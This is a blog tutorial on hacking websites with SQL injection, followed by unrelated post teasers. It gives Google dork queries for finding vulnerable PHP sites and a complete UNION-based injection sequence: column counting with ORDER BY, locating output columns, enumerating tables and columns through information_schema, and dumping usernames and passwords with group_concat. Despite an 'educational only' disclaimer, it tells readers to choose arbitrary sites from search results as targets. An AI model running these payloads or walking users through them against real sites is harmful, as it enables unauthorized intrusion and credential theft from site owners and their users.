Skip to main content

HACKING WEBSITES USING SQL INJECTION ATTACKS ON VULNERABLE SITES !!!

Warning: This is only for EDUCATIONAL purposes
to make you aware of the vulnerabilities that may
be present in your website so that you may self
test it in your OWNED website to IMPROVE the
SECURITY ,,,,,!!! The person posting this or the this
blog is not responsible for any type malicuous
activities performed by anyone else,,,,!!!
This is what they basically teach you when you
go for certain HACKING COURSES which I have
taken pains for hours to put this to you without
even earning a penny and sharing it for FREE,,,,!!!
Atleast some comments and feedback from you
will make me Happy ^_^
So Guyzzz I have now decided to post some
serious ADVANCED LEVEL OF Hacking stuffs
which is how the "Cracker" breaks into your
Vulnerable Websites,,,,!!!
All you need to know is a bit of SQL queries,,,!!!
It doesnt matter even if you are not an expert in
So here we go,,,
What is SQL Injection?
So let me give you some idea of what I am going
to talk about,,,,There are many complex
defenitions you may get in various other sites,,,
But I put it in simple terms,,,, You type some SQL
queries or codes [or whatever you wish to call
it ;D] on the address bar[whee you type the web
address of sites to be searched] to test vulnerable
website,,,,!!! If you find it vulnerable then
BINGO,,,!!! we will use some more SQL injection
queries to crack it,,,!!!
So guyzzz who are related to computer science
stream,,, If you found learning SQL boring this is
one way to make yourself interested in ;D
And as far as others are concerned,,, please dont
worry i'will be giving you some codes which you
may use to Test the Vulnerability of the site,,,!!!
QUICK STEPS TO FIND THE VULNERABILITY OF
WEBSITES,,,!!!
Step 1:
Search for any of the following terms in Google:
inurl:product.php?id=
inurl:index.php?id=
inurl:news.php?id=
inurl:shop.php?id=
inurl:shop.php?pid=
inurl:newsroom.php?id=
Step 2: Now for example say there is a website
that you found in Google search say for example
www.rahulswebsite.com/index.php?id=7
Open the website in a new tab,,,!!!
Step 3:
To test if your selected website is vulnerable:
Add the ' (single quote symbol) after the site as
follows
www.rahulswebsite.com/index.php?id=7'
and now Hit the "Enter" Key,,,!!!
If there is any type of " MySQL error " !!!BINGO,,,!!!
Then it means your target website is vulnerable.
STEPS TO HACK INTO THE WEBSITE AFTER
FINDING THE VULNERABILITY
Step 1:
After finding the vulnerability of your target site,
use the ORDER BY command to extract the
number of columns in the database.
Ex Code:
http://www.anywebsite.com/index.php?id=7
ORDER BY 1--
Doing ORDER BY 1-- should always return the
original page with NO error.
Step 2:
Then do ORDER BY 2--
If this shows the original page with NO error,
continue.
Now try ORDER BY 3--
and so on,
If this shows the original page with NO error,
continue.
Step 4:
Continue increasing the ORDER BY number until
you reach an error. For example, if doing ORDER
BY 10-- returns an error, then there is a table
which has NINE (9) columns, NOT 10. Always
subtract ONE from the number that produced the
error.
STEP 5:
Next step is to use UNION & SELECT
After getting the number of columns, let's say we
have NINE columns. Then you have to type the
following code:
Code:
http://www.anywebsite.com/index.php?id=7
UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
You should see a page with a few numbers
scattered throughout it. If so, continue,
IF NOT, try the following in which we have to add
the " - "hypen or negative sign in front of the id
value of our website:
Code:
http://www.anywebsite.com/index.php?id=-7
UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
At the end if this produces the scattered numbers,
continue, if not, STOP!!!
Choose anyother target website from the GOOGLE
search and repeat the vulnerability test,,,!!!
Step 6:
Now we use the database() command
After you see the scattered numbers, pick one to
exploit. Say the numbers on my page are TWO
and SEVEN. I will choose the number TWO. After
choosing your number, put database() in place of
it in your URL as shown below. REMEMBER, I
chose number TWO.
Code:
http://www.anywebsite.com/index.php?id=-7
UNION ALL SELECT 1,database(),3,4,5,6,7,8,9--
That should return some text in place of the
scattered TWO. WRITE THIS TEXT DOWN, and
move on.
Step 7: We use group_concat
This is where everything gets a little trickier! This
is also the part where you will be extracting data.
Yeah! Bingoo!!! :D :D *** Fist punch ***
After extracting the name of the database using
database(), type this where you typed database()
in the previous step.
Code:
http://www.anywebsite.com/index.php?id=-7
UNION ALL SELECT 1,group_concat
(table_name),3,4,5,6,7,8,9 from
information_schema.tables where
table_schema=database()--
TYPE THIS EXACTLY AS IT IS SHOWN, and press
enter.
In place of the scattered TWO, you should see a
LOT of text separated by commas. These are
called tables. The text varies by website, but you
usually want to look for things like "admin,"
"staff," or "users." Choose the one that interests
you. For this tutorial, I will choose "users." Now
type this:
Code:
http://www.anywebsite.com/index.php?id=-7
UNION ALL SELECT 1,group_concat
(column_name),3,4,5,6,7,8,9 from
information_schema.columns where
table_schema=database()--
OR
if you want the columns from ONLY one table, use
this (courtesy of dR..EviL):
Code:
http://www.anywebsite.com/index.php?
id=-7UNION ALL SELECT 1,group_concat
(column_name),3,4,5,6,7,8,9 from
information_schema.columns where table_name=<
table name goes here in hex or ascii format >--
This should return even more text. These are
called columns. Again choose what interests you,
but for this tutorial, I will choose "username" and
"password."
The columns "username" and "password" contain
the data we want to extract. To extract the final
data, meaning, in this case, the usernames and
passwords of all the users, type this:
Code:
http://www.anywebsite.com/index.php?id=-7
UNION ALL SELECT 1,group_concat
(username,0x3a,password,0x3a),3,4,5,6,7,8,9 from
users--
Where it says "username,0x3a,password,0x3a" is
where you would the name of your chosen
COLUMNS, such as username and password, DO
NOT replace the 0x3a, ONLY the username and
password area. Where it says "from users--,"
replace "users" with the name of your chosen
table such as the one "users." All of this will
produce even MORE text in this format:
Code:
admin:thisismypass:,
The comma separates each set of data.

Manish chauhan

Comments

Popular posts from this blog

Top 8 Best WhatsApp Tips And Tricks Of 2017

Top 8 Best WhatsApp Tips And Tricks Of 2017 M illions of people are using WhatsApp these days. It is as popular as Facebook, Twitter or Instagram. With millions of users, we can presume that most of the people at least use it once in a day. And everybody thinks that they know everything about WhatsApp. Maybe some of them do. But most of the people doesn’t, because technology won’t stop. There are always more tips and tricks which you can learn and use anytime. So that’s why today I am going to tell you about Top 8 Best And Cool WhatsApp Tips And Tricks which will definitely help you to become WhatsApp pro. So check out the Tricks in the description below. Top 8 Best WhatsApp Tips And Tricks Of 2017 1. Create Chat Shortcuts If you are chatting with 2 or 3 people at the same time on WhatsApp like with your girlfriend, wife, and with others, it won’t be easy to manage all those chats. So to make it easy, you can create conversation shortcuts to your home screen so that you don’t need to o...

Why Does 64-Bit Windows Need a Separate “Program Files (x86)” Folder ?

Why Does 64-Bit Windows Need a Separate “Program Files (x86)” Folder ? Why Does 64-Bit Windows Need a Separate “Program Files (x86)” Folder ? If you are currently running any version of 64-bit windows operating system, you might have noticed that there is two types of programs files. One is the regular program files and another one is programs files (X86). Well, in this article, I am going to delineate between these folders and help you to understand why Windows really need both of them. 32-bit and 64-bit Computers and Windows Since the mid of 90s, almost all PC were running on 32-bit Windows. But after the release of Windows 7, the sales of 64-bit Windows computer started and there were two programs files have installed in 64-bit Windows 7 computers. 64-bit PCs gained more popularity with times over 32-bit PCs. People will prefer 64-bit computers because they can handle much more RAM (memory) and they are generally faster because they use more advance...

A Lone Hacker Defaces The Google Brazil Domain, Google.com.br Unavailable To Brazilians

A Lone Hacker Defaces The Google Brazil Domain,  Google . com .br Unavailable To Brazilians Google . com .br was hacked by a lone hacker on Tuesday afternoon. The hacker left a deface page along with a message on the targeted Google Domain greetings his friends for the successful attack on such a highly reputed domain. This is the 2 nd  time in a week, when  Google . com .br has hacked after the Google Bangladesh website is hacked by Pakistani hackers. Here’s the full preview of the defaced page, “It was a great moment to die.” Hacked by Kuroi’SH! Too Google at once, I don’t even care; f**k the jealous hates such as Nofawkx. Two Google at once world record idgaf :D. Greets to my friends Prosox & Shinobi h4xor.” Google Brazil immediately tried to restore the hacked website, but unable to gain control as the domain. But now  Google . com .br is available to visitors. According to Brazil media reports, the Google Brazil users were getting the defaced message from Ku...